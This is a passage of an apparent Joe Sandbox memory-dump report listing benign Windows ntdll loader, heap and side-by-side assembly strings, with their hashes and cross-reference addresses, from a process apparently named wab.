                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-792281065
                                                                              • Opcode ID: 61ebf339b5c9da4de7de06a204cc9d1ce3bd3d98f8562448151a42f788806628
                                                                              • Instruction ID: a433bfbefb7535d9efe719ceda13193485cd0e57d153f0b3afb77a6b96d7f7ba
                                                                              • Opcode Fuzzy Hash: 61ebf339b5c9da4de7de06a204cc9d1ce3bd3d98f8562448151a42f788806628
                                                                              • Instruction Fuzzy Hash: 8B916B32F0D3559BEF16CF50C998F5A7BB0AF51768F000138EA147B28ADB789941CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 22772180
                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 22772178
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 227721BF
                                                                              • RtlGetAssemblyStorageRoot, xrefs: 22772160, 2277219A, 227721BA
                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2277219F
                                                                              • SXS: %s() passed the empty activation context, xrefs: 22772165
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                              • API String ID: 0-861424205
                                                                              • Opcode ID: 39023e7d8cc7542aa0bc591bcec031eb4cf0eb29c8b3c2ca8f3bf29632231b2f
                                                                              • Instruction ID: 2664e45823be2813c46af64b365f14a36f49aeacf411e0b3d5117422f62287de
                                                                              • Opcode Fuzzy Hash: 39023e7d8cc7542aa0bc591bcec031eb4cf0eb29c8b3c2ca8f3bf29632231b2f
                                                                              • Instruction Fuzzy Hash: 88310532B093557BFB138A958C84F9B7778EB75794F010069BB18B7245D6B09E00C7E2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 227781E5
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 22778181, 227781F5
                                                                              • Loading import redirection DLL: '%wZ', xrefs: 22778170
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 2273C6C3
                                                                              • LdrpInitializeImportRedirection, xrefs: 22778177, 227781EB
                                                                              • LdrpInitializeProcess, xrefs: 2273C6C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-475462383
                                                                              • Opcode ID: a5ff65530bd5432fbbc172774f9c1656913c2eaa8f902aee9b1009ac3b6eee87
                                                                              • Instruction ID: 288281d00f2a5cd527de8537c272560a06ccf0249a689859ddde7ad6ca9c0717
                                                                              • Opcode Fuzzy Hash: a5ff65530bd5432fbbc172774f9c1656913c2eaa8f902aee9b1009ac3b6eee87
                                                                              • Instruction Fuzzy Hash: 3C31257274C7459BC311DF28CD89E2A77E4EF94724F000A6CF945AB295EA34EC04C7A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: This is located in the %s field of the heap header.$ -o"`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                              • API String ID: 0-865020606
                                                                              • Opcode ID: 12848e77133183cf9091b46ff9fa914823872139a2dd728ac034f67212914e31
                                                                              • Instruction ID: dbc547f59bd993daab0f182a262a35646990676ca46292de68bdacee2e4471c7
                                                                              • Opcode Fuzzy Hash: 12848e77133183cf9091b46ff9fa914823872139a2dd728ac034f67212914e31
                                                                              • Instruction Fuzzy Hash: 4C31EF33B08314EFEB01CB98C984F9B77E9EF09764F204555E941DB2A1E674AD40CE65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                              • API String ID: 0-3061284088
                                                                              • Opcode ID: 7ddb803f23abe6b0516b3e98d82b6469eae9a1d468b9799a65615bf3c982f988
                                                                              • Instruction ID: 62b3e71785eb8b5eca8cb47447d5450a78597012720dd9c1d01d830fa3d5aae3
                                                                              • Opcode Fuzzy Hash: 7ddb803f23abe6b0516b3e98d82b6469eae9a1d468b9799a65615bf3c982f988
                                                                              • Instruction Fuzzy Hash: A101473310C386DFE3168B18E459FA2F7E4EF47730F344059E90587AA5CAA89884C224
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: 04b5b0f4fbd15d87b3abce857000b297b1a13ab4bf095ae0595cf49479204d74
                                                                              • Instruction ID: 1d7f2d786a74c335b795cacbc6d1997c3fb20f0293401c00da231ad5cbfc9254
                                                                              • Opcode Fuzzy Hash: 04b5b0f4fbd15d87b3abce857000b297b1a13ab4bf095ae0595cf49479204d74
                                                                              • Instruction Fuzzy Hash: 4C13AD70A08755CFEB15CF68C980BA9BBF1FF49304F5482A9D949AB382D734A945CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-3570731704
                                                                              • Opcode ID: dc26e9f9d89a7506cdf0443cc17b5413f803f82beb598c67bc9ff365d7f6c532
                                                                              • Instruction ID: 65fa645c179ea6024073d8f5f387213b84a46fd329f51c79a2b0133df17d5d11
                                                                              • Opcode Fuzzy Hash: dc26e9f9d89a7506cdf0443cc17b5413f803f82beb598c67bc9ff365d7f6c532
                                                                              • Instruction Fuzzy Hash: E1925971A09369CFEB24CF28C945FA9B7B5BF44314F0582EAD949AB291D7309E80CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\Um"
                                                                              • API String ID: 0-3496295636
                                                                              • Opcode ID: 70efaa9869cb500f908d2dde900ec44880b79ed3d73cb18f099bb5aee240abb9
                                                                              • Instruction ID: 25a897c87bb69e3dbb85d2fab10e93286041e8f0750fb55e4b585a4069906df5
                                                                              • Opcode Fuzzy Hash: 70efaa9869cb500f908d2dde900ec44880b79ed3d73cb18f099bb5aee240abb9
                                                                              • Instruction Fuzzy Hash: 3BB1AE31A187068FCB15CF69CA81FAEB7F1BF44B18F145529E961EB681E730EA44CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                              • API String ID: 0-379654539
                                                                              • Opcode ID: f36899344f484839c3fa970173c39cab8e3bfbba1451471382590afc51e69053
                                                                              • Instruction ID: c6bdd6b4312030bb0b294cdf472709b2fdfb0835e48440cf1da38a8aeaf79a87
                                                                              • Opcode Fuzzy Hash: f36899344f484839c3fa970173c39cab8e3bfbba1451471382590afc51e69053
                                                                              • Instruction Fuzzy Hash: 99C18A7510C382CFC711CF68C544B6AB7E4BF98708F408A6AFE959B251E778CA49CB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 227722B6
                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 227721D9, 227722B1
                                                                              • .Local, xrefs: 227328D8
                                                                              • SXS: %s() passed the empty activation context, xrefs: 227721DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                              • API String ID: 0-1239276146
                                                                              • Opcode ID: 081847852bb4ed04b2d6bd4e8cc6f49728f7ec13c056a1543de2d27134787851
                                                                              • Instruction ID: 7ebd43e4ec5e42c2dc9852d2743165f35b17dce803f8fa89f85ec74700172dc1
                                                                              • Opcode Fuzzy Hash: 081847852bb4ed04b2d6bd4e8cc6f49728f7ec13c056a1543de2d27134787851
                                                                              • Instruction Fuzzy Hash: 5FA19131A09369DBCB26CF64CD88B99B3B1BF68314F1101E9D958BB252D7709E81CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                              • API String ID: 0-2586055223
                                                                              • Opcode ID: d407189241cc44fcc72c6d18a06f8f3332d2223dbd63ce98919626dac24fffcd
                                                                              • Instruction ID: c2c2a1553d26d500b3732ce2598bad72f57c82f19e4c35f745aee5f10b04d77f
                                                                              • Opcode Fuzzy Hash: d407189241cc44fcc72c6d18a06f8f3332d2223dbd63ce98919626dac24fffcd
                                                                              • Instruction Fuzzy Hash: A7611172208780AFE712CF24C988F5BB7E9EF84754F140968FA958B291DB34D951CB62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                              • API String ID: 0-1391187441
                                                                              • Opcode ID: fe89e99ae27804c6c14617bbda2185a1f119a7255ea769d61c2df1d0aef2e1ca
                                                                              • Instruction ID: b39c5924a7cdec08216834e58013c2ce176333d765b35fb1227df146757d3f99
                                                                              • Opcode Fuzzy Hash: fe89e99ae27804c6c14617bbda2185a1f119a7255ea769d61c2df1d0aef2e1ca
                                                                              • Instruction Fuzzy Hash: 0B31CD33A01309EFDB11CF55C888FAAB7B8EF49724F204165F915AB291D770E940CA64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$BuildLabEx$Es"$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                              • API String ID: 0-2192126613
                                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                              • Instruction ID: edca5f0000e8aafdef24cf9f038d9a7fed681019a3e89b3abfe9eb4f1bbfdc67
                                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                              • Instruction Fuzzy Hash: CF318F72E05718FBDF129FA5CC44E9EBBB9EF94754F004025EA14B7160EB349A05DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-4253913091
                                                                              • Opcode ID: c513d556dc1128e5bc4a21575d937ac87ee2a4c8f160f32961a06d91458cf451
                                                                              • Instruction ID: a0d45150c3e4ca9c518f3a3e741dfae216f68dd06cf1748b88df3c60049e18f4
                                                                              • Opcode Fuzzy Hash: c513d556dc1128e5bc4a21575d937ac87ee2a4c8f160f32961a06d91458cf451
                                                                              • Instruction Fuzzy Hash: 94F18970A08706DFDB15CF68C994F6AB7B5FF44704F108269EA15AB386D734EA81CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                              • API String ID: 0-2391371766
                                                                              • Opcode ID: b9530e54d82376a68fecf0cc267e5e6e0c1e6c771b7d269503eeab0cd6d36371
                                                                              • Instruction ID: 07cd2764c5acfb839bb3dcb06754ad85b5ef302114bfea2e851a25d2887a1f76
                                                                              • Opcode Fuzzy Hash: b9530e54d82376a68fecf0cc267e5e6e0c1e6c771b7d269503eeab0cd6d36371
                                                                              • Instruction Fuzzy Hash: 73B19B7260C341AFE312DF58C984F5BB7E8EB54714F01092AFA60AB290DB74E944DB97
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                              • API String ID: 0-2779062949
                                                                              • Opcode ID: 25542976c48bc4b279b7170bfd383b6ce7750e62a68181017480240cfce0fbd1
                                                                              • Instruction ID: cd2cc3156ac60b1d253d36f1b88cbad0bb09e783868341fdfdf08bff1927fa25
                                                                              • Opcode Fuzzy Hash: 25542976c48bc4b279b7170bfd383b6ce7750e62a68181017480240cfce0fbd1
                                                                              • Instruction Fuzzy Hash: 3BA18C72D157299BDB21DF24CC88BDAB7B8EF44704F1001EAEA09A7250E7399E84CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                              • API String ID: 0-318774311
                                                                              • Opcode ID: d4daa294abfd9cdfa52f557adb56a565186a36c43c9cdd4fc602b35466e1e19b
                                                                              • Instruction ID: 36e7eb5ae263fb8c5a62db2efd088b4f36130f36c639296994abe34b7d6628de
                                                                              • Opcode Fuzzy Hash: d4daa294abfd9cdfa52f557adb56a565186a36c43c9cdd4fc602b35466e1e19b
                                                                              • Instruction Fuzzy Hash: 6A819B7160C341AFE311CB24D985F6ABBE8EF95754F000A69FE90AB390DB75D904CB62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %$&$@
                                                                              • API String ID: 0-1537733988
                                                                              • Opcode ID: ef8ed6ed4124d2ec918e7b0e6027035c186cd2aa2c94dcc15e975bfd54a47a4e
                                                                              • Instruction ID: 9dcd479a62b38ef281ae4ee9c6bae68a15d7b10361fc5c3d4e5c463296179af0
                                                                              • Opcode Fuzzy Hash: ef8ed6ed4124d2ec918e7b0e6027035c186cd2aa2c94dcc15e975bfd54a47a4e
                                                                              • Instruction Fuzzy Hash: 6F71CF7060D742DFC722CF24CA84B1BBBE5BF98718F504A1DE9AA67252D730D905CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • TargetNtPath, xrefs: 227DB82F
                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 227DB82A
                                                                              • GlobalizationUserSettings, xrefs: 227DB834
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                              • API String ID: 0-505981995
                                                                              • Opcode ID: f6af684f3ad638b352495e4cf1ba2c5ce6310a6dce4cc01e487e6fc475031263
                                                                              • Instruction ID: b025ad7239fe0c1af3603d3f4ba7a079beae8c391c1be3ca05f44e828c4e184b
                                                                              • Opcode Fuzzy Hash: f6af684f3ad638b352495e4cf1ba2c5ce6310a6dce4cc01e487e6fc475031263
                                                                              • Instruction Fuzzy Hash: 76616E73D45369ABDB21DF54CC88BDABBB8AF14714F0101E5AA08AB250DB749E84CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • Failed to reallocate the system dirs string !, xrefs: 227782D7
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 227782E8
                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 227782DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1783798831
                                                                              • Opcode ID: 389732bdf19ab837b8104699698b2bd3eee4d972b545810362b4f7fb79d0d903
